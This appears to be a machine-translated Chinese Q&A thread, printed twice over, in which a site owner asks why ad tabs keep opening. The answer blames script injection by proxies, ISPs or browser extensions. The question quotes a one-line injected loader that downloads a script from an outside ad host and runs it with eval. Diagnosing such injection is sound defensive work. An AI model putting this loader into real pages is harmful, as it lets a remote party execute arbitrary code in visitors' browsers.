在网站上查找恶意软件
Finding malware on website
我在这个问题上有点迷茫,所以请原谅。我知道 SO 上还有其他关于此的主题,但我找不到答案。
在网站上加载时,用户点击它的位置并不重要,它是在带有广告的浏览器中打开添加选项卡。
到目前为止,我通过浏览器控制台找到的是加载了一些 js 文件
http://cdn.mecash.ru/js/replace.js
此文件包含
!function(w){if(w.self==w.top){var r=new XMLHttpRequest;r.onload=function(){eval(this.responseText)},r.open("get","//myclk.net/js/tx.js",!0),r.send()}}(window);
并且通过查看这个 tx.js
我怀疑这是黑客注入的。
问题是我一直在查看主机上的文件,但找不到任何包含或类似内容 js
..
谁能帮我告诉我在哪里或者我怎样才能找到它?
实际上这种文件是在数据从服务器传输到客户端时被注入的。
您的实际代码不包含脚本,但是它们被注入并在客户端计算机上执行。
可能注入者:
- 第三方代理,使用的代理服务器。
- 在某些情况下由 ISP 注入。
- Malicious/Compromised 已安装浏览器扩展。
您可以通过 https
而不是 http
传输内容来避免 proxy/ISP 注入。但是,通过 browswer extensions
完成的注入可以通过仅卸载扩展来避免。
我在这个问题上有点迷茫,所以请原谅。我知道 SO 上还有其他关于此的主题,但我找不到答案。
在网站上加载时,用户点击它的位置并不重要,它是在带有广告的浏览器中打开添加选项卡。
到目前为止,我通过浏览器控制台找到的是加载了一些 js 文件
http://cdn.mecash.ru/js/replace.js
此文件包含
!function(w){if(w.self==w.top){var r=new XMLHttpRequest;r.onload=function(){eval(this.responseText)},r.open("get","//myclk.net/js/tx.js",!0),r.send()}}(window);
并且通过查看这个 tx.js
我怀疑这是黑客注入的。
问题是我一直在查看主机上的文件,但找不到任何包含或类似内容 js
..
谁能帮我告诉我在哪里或者我怎样才能找到它?
实际上这种文件是在数据从服务器传输到客户端时被注入的。 您的实际代码不包含脚本,但是它们被注入并在客户端计算机上执行。
可能注入者:
- 第三方代理,使用的代理服务器。
- 在某些情况下由 ISP 注入。
- Malicious/Compromised 已安装浏览器扩展。
您可以通过 https
而不是 http
传输内容来避免 proxy/ISP 注入。但是,通过 browswer extensions
完成的注入可以通过仅卸载扩展来避免。